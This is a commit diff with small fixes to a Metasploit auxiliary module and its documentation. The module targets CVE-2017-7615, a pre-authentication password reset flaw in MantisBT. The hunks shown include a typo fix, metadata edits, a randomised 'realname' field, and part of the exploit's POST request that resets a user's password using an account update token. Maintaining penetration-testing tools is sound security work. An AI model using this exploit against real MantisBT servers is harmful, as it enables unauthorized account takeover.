Fix some stuff
parent
5fe805aaca
commit
f10cf75ae0
|
@ -12,7 +12,7 @@ on
|
|||
4. Do: ```set rhost```
|
||||
5. Do: ```run```
|
||||
6. If the system is vulnerable, the module should tell you that the password
|
||||
was successfulyl changed.
|
||||
was successfully changed.
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
|
|
@ -23,10 +23,9 @@ class MetasploitModule < Msf::Auxiliary
|
|||
['CVE', '2017-7615'],
|
||||
['EDB', '41890'],
|
||||
['URL', 'https://mantisbt.org/bugs/view.php?id=22690']
|
||||
['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
|
||||
['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
|
||||
],
|
||||
'Platform' => ['win', 'linux'],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Apr 16, 2017"))
|
||||
|
||||
register_options(
|
||||
|
@ -93,7 +92,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
'vars_post' => {
|
||||
'verify_user_id' => datastore['USERID'],
|
||||
'account_update_token' => $1,
|
||||
'realname' => 'jvoisin',
|
||||
'realname' => Rex::Text.rand_text_alpha(rand(5) + 8),
|
||||
'password' => password,
|
||||
'password_confirm' => password
|
||||
},
|
||||
|
|
Loading…
Reference in New Issue